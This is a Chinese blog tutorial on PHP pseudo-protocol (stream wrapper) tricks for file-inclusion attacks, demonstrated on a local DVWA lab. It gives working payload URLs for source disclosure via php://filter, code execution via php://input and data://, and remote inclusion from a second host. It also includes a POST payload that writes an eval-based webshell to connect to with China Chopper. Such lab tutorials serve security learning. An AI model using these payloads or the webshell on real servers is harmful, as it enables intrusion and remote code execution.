PHP安全 [伪协议]

最新推荐文章于 2024-02-19 21:32:43 发布
最新推荐文章于 2024-02-19 21:32:43 发布
阅读量1k 收藏 1
点赞数 2
分类专栏: PHP 文章标签: php shell 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253622/article/details/116978946
版权

PHP安全 [伪协议]

file://协议

​http://协议

php://协议

zip:// bzip2:// zlib://协议

data://协议

phar:// 协议

首先在\DVWA-master\vulnerabilities\fi\目录下新建1.txt 2.txt 3.zip方便环境测试。

 

 

file://协议

file协议主要用于访问本地计算机中的文件,也就是用于访问本地文件系统,且不受allow_url_fopen与allow_url_include的影响;!只能传入本地绝对路径。

file://文件系统是 PHP 使用的默认封装协议,展现了本地文件系统。当指定了一个相对路径(不以/、、\或 Windows 盘符开头的路径)提供的路径将基于当前的工作目录。在很多情况下是脚本所在的目录,除非被修改了。使用 CLI 的时候,目录默认是脚本被调用时所在的目录。在某些函数里,例如 fopen() 和 file_get_contents(),include_path 会可选地搜索,也作为相对的路径。

使用:

file://[文件的绝对路径+文件名]

http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=file://D:\phpstudy\PhpStudy20180211\PHPTutorial\WWW\DVWA-master\vulnerabilities\fi\2.txt

注意这里读取的是txt文件,但是被当成php文件解析了。

其它

我们访问当前目录:

http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=./1.txt

http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=2.txt 

http://协议

http://[url+文件名]

http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=http://192.168.41.129:8080/test1.txt

http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=http://www.baidu.com

php://协议

php:// — 访问各个输入/输出流(I/O streams);PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。不受allow_url_fopen的影响,但是php://input php://stdin php://memory php://temp 需要配置allow_url_include为on。

在CTF中,通常使用php://filter用于读取源码,使用php://input 执行php代码。

php://input  可以访问请求的原始数据的只读流,在POST请求中访问POST的data部分,在enctype="multipart/form-data"的时候 php://input 是无效的。

php://output  只写的数据流,允许以print和echo一样的方式写入到输出缓冲区。

php://fd  (>=5.3.6)允许直接访问指定的文件描述符。例如 php://fd/3 引用了文件描述符3。

php://memory php://temp  (>=5.1.0)一个类似文件包装器的数据流,允许读写临时数据。两者的唯一区别是:php://memory 总是把数据存在内存中,而php://temp 会在内存量达到预定义的限制后(默认是2MB)存入临时文件中。临时文件位置的决定和sys_get_temp_dir()的方式一致。

php://filter (>=5.0.0)一种元封装器,设计用于数据流打开时的筛选过滤应用。对于一体化(all-in-one)的文件函数非常有用,类似readfile()、file()和file_get_contents(),在数据流内容之前没有机会应用其他过滤器。

参数讲解:该协议的参数会在该协议路径上进行传递,多个参数都可以在一个路径上传递。具体参考如下:

resource=<要过滤的数据流>:必须项。它指定了你要筛选过滤的数据流。

read=<读链的过滤器>:可选项。可以设定一个或多个过滤器名称,以管道符(*\*)分隔。

write=<写链的过滤器>:可选项,可以设定一个或多个过滤器名称,以管道符(\)分隔。

<; 两个链的过滤器>:任何没有以read=或write=作前缀的筛选器列表会视情况应用于读或写链。

使用

1、php://filter/read=convert.base64-encode/resource=[文件名]读取文件源码(针对php文件我们需要base64编码)

http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=index.php

PD9waHANCg0KZGVmaW5lKCAnRFZXQV9XRUJfUEFHRV9UT19ST09UJywgJy4uLy4uLycgKTsNCnJlcXVpcmVfb25jZSBEVldBX1dFQl9QQUdFX1RPX1JPT1QgLiAnZHZ3YS9pbmNsdWRlcy9kdndhUGFnZS5pbmMucGhwJzsNCg0KZHZ3YVBhZ2VTdGFydHVwKCBhcnJheSggJ2F1dGhlbnRpY2F0ZWQnLCAncGhwaWRzJyApICk7DQoNCiRwYWdlID0gZHZ3YVBhZ2VOZXdHcmFiKCk7DQokcGFnZVsgJ3RpdGxlJyBdICAgPSAnVnVsbmVyYWJpbGl0eTogRmlsZSBJbmNsdXNpb24nIC4gJHBhZ2VbICd0aXRsZV9zZXBhcmF0b3InIF0uJHBhZ2VbICd0aXRsZScgXTsNCiRwYWdlWyAncGFnZV9pZCcgXSA9ICdmaSc7DQokcGFnZVsgJ2hlbHBfYnV0dG9uJyBdICAgPSAnZmknOw0KJHBhZ2VbICdzb3VyY2VfYnV0dG9uJyBdID0gJ2ZpJzsNCg0KZHZ3YURhdGFiYXNlQ29ubmVjdCgpOw0KDQokdnVsbmVyYWJpbGl0eUZpbGUgPSAnJzsNCnN3aXRjaCggJF9DT09LSUVbICdzZWN1cml0eScgXSApIHsNCgljYXNlICdsb3cnOg0KCQkkdnVsbmVyYWJpbGl0eUZpbGUgPSAnbG93LnBocCc7DQoJCWJyZWFrOw0KCWNhc2UgJ21lZGl1bSc6DQoJCSR2dWxuZXJhYmlsaXR5RmlsZSA9ICdtZWRpdW0ucGhwJzsNCgkJYnJlYWs7DQoJY2FzZSAnaGlnaCc6DQoJCSR2dWxuZXJhYmlsaXR5RmlsZSA9ICdoaWdoLnBocCc7DQoJCWJyZWFrOw0KCWRlZmF1bHQ6DQoJCSR2dWxuZXJhYmlsaXR5RmlsZSA9ICdpbXBvc3NpYmxlLnBocCc7DQoJCWJyZWFrOw0KfQ0KDQpyZXF1aXJlX29uY2UgRFZXQV9XRUJfUEFHRV9UT19ST09UIC4gInZ1bG5lcmFiaWxpdGllcy9maS9zb3VyY2UveyR2dWxuZXJhYmlsaXR5RmlsZX0iOw0KDQovLyBpZiggY291bnQoICRfR0VUICkgKQ0KaWYoIGlzc2V0KCAkZmlsZSApICkNCglpbmNsdWRlKCAkZmlsZSApOw0KZWxzZSB7DQoJaGVhZGVyKCAnTG9jYXRpb246P3BhZ2U9aW5jbHVkZS5waHAnICk7DQoJZXhpdDsNCn0NCg0KZHZ3YUh0bWxFY2hvKCAkcGFnZSApOw0KDQo/Pg0K

分别使用php://filter/resource=1.txt、 php://filter/resource=2.txt 我们发现:

 我们实验发现:php语法文件include成功会被直接当成php来解析,非php语法文件会直接输出源码内容。所以我们想要输出php源码的内容,那么我们就使用http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=index.php来读取php代码的base64加密后的编码格式。再进行解码即可。

2、php://input + [POST DATA]执行php代码

http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=php://input

然后抓包在[POST DATA]部分输入:

<?php phpinfo(); ?>

如果有写入权限的话,我们可以在[POST DATA]部分写入一句话木马:

<?php fputs(fopen('D:\phpstudy\PhpStudy20180211\PHPTutorial\WWW\DVWA-master\vulnerabilities\fi\key.php','w'),'<?php @eval($_POST['key']);?>');  ?>

 然后使用菜刀相连即可,http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/key.php

zip:// bzip2:// zlib://协议

zip:// & bzip2:// & zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀:jpg png gif xxx 等等;不受allow_url_fopen 和 allow_url_include的影响。

这里注意:

(1)只能传入绝对路径
(2)要用#分隔压缩包和压缩包内的内容,并且#要用url编码%23

用法:

1、zip://[压缩文件绝对路径]%23[压缩文件内的子文件名](#编码为%23)

http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=zip://D:\phpstudy\PhpStudy20180211\PHPTutorial\WWW\DVWA-master\vulnerabilities\fi\3.zip%233.txt

 

2、compress.bzip2://file.bz2

压缩phpinfo.txt 为phpinfo.bz2并上传(同样支持任意后缀名)

http://192.168.41.1:8080/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2

 

data://协议

需要allow_url_fopen和allow_url_include都为on;自PHP>=5.2.0起,可以使用data://数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。

用法:data://text/plain,[<?php 执行内容 ?>]

http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=data://text/plain,<?php%20phpinfo();?>

data://text/plain;base64,[<?php 执行内容 ?>base64编码]

http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

phar:// 协议


phar://协议与zip://类似,同样可以访问zip格式压缩包内容:

1、传入绝对路径

http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=phar://D:\phpstudy\PhpStudy20180211\PHPTutorial\WWW\DVWA-master\vulnerabilities\fi\3.zip\3.txt

2.传入相对路径

http://192.168.41.1:8080/DVWA-master/vulnerabilities/fi/?page=phar://3.zip/3.txt

 

相关文章:https://blog.csdn.net/loseheart157/article/details/107946865?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162130463316780274127105%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=162130463316780274127105&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-107946865.first_rank_v2_pc_rank_v29&utm_term=PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE&spm=1018.2226.3001.4187

相关文章:https://blog.csdn.net/bring_coco/article/details/116779587?spm=1001.2014.3001.5501

carefree798
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
[代码审计篇]php代码审计之浅析Phar伪协议
qq_43668710的博客
04-15 1515
0x01 前言 简要说明 写这篇博客的目的只有两个 为**[代码审计篇]**中关于php反序列化漏洞的审计作铺垫 为上一篇博客做点漏洞原理的补充 环境工具 Win10 Phpstudy_pro Sublime_Text 3 注意(tips) PHAR的使用需要将php.ini设置phar.readonly设置为Off才能用于PHAR对象 PHAR 这个词是PHP和 Archive的组合词,基...
谈一谈php://filter的妙用
kexin178的博客
01-29 178
原文来源:https://www.leavesongs.com/PENETRATION/php-filter-magic.html php://filter是PHP中独有的协议,利用这个协议可以创造很多“妙用”,本文说几个有意思的点,剩下的大家自己下去体会。本来本文的思路我上半年就准备拿来做XDCTF2016的题目的,没想到被三个白帽的一题抢先用了,我也就只好提前分享一下。 XXE中的使用 php://filter之前最常出镜的地方是XXE。由于XXE漏洞的特殊性,我们在读取HTML、PHP等文.
phar://、zip://伪协议进行shell上传
weixin_43749601的博客
06-18 1286
phar:// 环境:可上传png、jpg 首先写一个一句话木马shell.php接着压缩成zip文件。将后缀改为png文件进行上传,上传文件后使用shell工具进行连接。 http://localhost/?url=phar://uploads/63e93ffe53f03e93bb0a0249152d243874e31c9b.png/shell zip:// 环境:可上传png、zip 首先写一个一句话木马shell.php接着压缩成zip文件。直接上传zip文件,然后使用shell工具进行连接。 htt
文件包含之——phar伪协议
abc18964814133的博客
05-09 6653
文件上传之phar伪协议
pop链构造和phar://协议
qq_48511129的博客
12-13 725
phar类似java中的jar包,是一种压缩包。可以对php项目进行打包成 .phar类型的文件,也可以把某个功能模块打包直接发布。 1.配置 要想使用phar文件,必须将phar.readonly配置项配置为0或Off <?php class B{ public function __destruct(){ echo $this -> name; } } $phar = new Phar("test.phar"); $phar -> startBuff
php伪协议之phar
最新发布
woshicainiao666的博客
02-19 844
php伪协议---phar
php phar,PHP phar:协议对象注入技术介绍
weixin_42509766的博客
03-11 99
前言在之前的BlackHat 2018大会上公布了一款针对PHP应用程序的全新攻击技术。我们将通过这篇文章简单介绍下。来自Secarma的安全研究员Sam Thomas发现了一种新的开发技术,它可以导致PHP对象注入漏洞——而无需使用PHPunserialize()函数。这项新技术是在BlackHat 2018大会上公布的,利用PHP反序列化漏洞升实现远程代码执行。我们在RIPS代码分析引擎中添加...
文件包含漏洞读取当前页面的源代码php://filter协议
tutuwanc的博客
12-05 734
当我们的网址为“网址+/include.php?page=“或者“网址+/include.php?file=“,总之就是网址有文件包含我们可以利用来读取我们当前的页面代码,用base64解码来读取。这是一个file关键字的参数传递,对php://filter的解析。
一个phar://的漏洞
Xi4or0uji
10-17 5821
前段时间打了个护网杯,题目质量是真的高,肉鸡又菜了一整场,遇到了一个不太会的东西,复现了一波,记录下好吧。 这个鬼东西就是phar://的序列化的漏洞 介绍一下 phar://跟php://filter 、data://那些一样,都是流包装,可以将一组php文件进行打包,可以创建默认执行的stub stub 就是一个标志,格式xxx&lt;?php xxxxx; __HALT_COMPIL...
[BSidesCF 2020]Had a bad day
m0_62709637的博客
05-27 135
点击查看: 感觉像sql注入进行测试: 发现了另外的关键词语:include(); 这不难让我们想到文件包含漏洞 使用伪协议查看源代码(感觉是一种思路) php://filter/convert.base64-encode/resource=index(这里不能使用index.php) 进行base64解码获得源代码 (截取关键代码) 我们可以看到它对输入进行了白名单限制,这也合理的解释了为什么不能使用 php://filter/convert.base64-encod
文件包含漏洞+php伪协议
unexpectedthing的博客
11-11 6709
文章目录常见的文件包含函数基本绕过:利用php伪协议1.php://input2.php://filter3.data协议4.zip协议5.bzip2://协议6.zlib://协议7. phar://协议8..file协议日志包含介绍利用条件漏洞利用流程日志文件路径远程文件包含条件流程PHPSESSION包含包含/proc/self/environ文件包含临时文件过程包含上传文件绕过类型指定后缀绕过利用长度截断%00截断url指定前缀截断目录遍历编码参考文献 常见的文件包含函数 php文件包含函数有下面四
文件包含漏洞
qq_50854662的博客
05-21 6698
【文件包含】文件包含漏洞知识总结 一、什么是文件包含漏洞? 1、文件包含概述 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程就叫做包含。 有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任.
PHP伪协议详解
m0_67401228的博客
08-02 1419
phpexit();亦或者phpexit();?这样即使插入了一句话木马,在被使用的时候也无法被执行。这样的死亡exit通常存在于缓存、配置文件等等不允许用户直接访问的文件当中。
php伪协议
weixin_60719780的博客
01-27 4933
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
20201229攻防世界WEB高手区题目一题多解全教程通关(1-6)
qq_45290991的博客
01-08 727
001baby_web 002Trainng WWW Robots 有关robots.txt的知识可以参考:https://www.cnblogs.com/yuzhongwusan/archive/2008/12/06/1348969.html 打开robots.txt会发现它只允许俄罗斯最大的搜索引擎爬取他的flag: 我们打开BP把自己的USER-agent改为Yandex就好了: 然后访问fl0g.php就会发现我们需要的flag:cyberpeace{3084111b0
php://filter的各种过滤器
qq_44657899的博客
10-27 9334
文章目录0x01 String Filters 0x01 String Filters 1,string.rot13 string.rot13对字符串执行 ROT13 转换,ROT13 编码简单地使用字母表中后面第 13 个字母替换当前字母,同时忽略非字母表中的字符。 2,string.toupper string.toupper 将字符串转化为大写 3,string.tolower string.toupper 将字符串转化为小写 4,string.strip_tags string.strip_t
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
php://filter(文件包含漏洞利用)及php://input
Sea_Sand息禅
11-17 5849
1. php://filter 文件包含漏洞:https://blog.csdn.net/fageweiketang/article/details/80699051 筛选过滤应用: 1、 字符串过滤器: string.rot13 对字符串执行ROT13转换 string.toupper转换为大写 string.tolower 转换为小写 string.strip_tags去除...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

carefree798

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值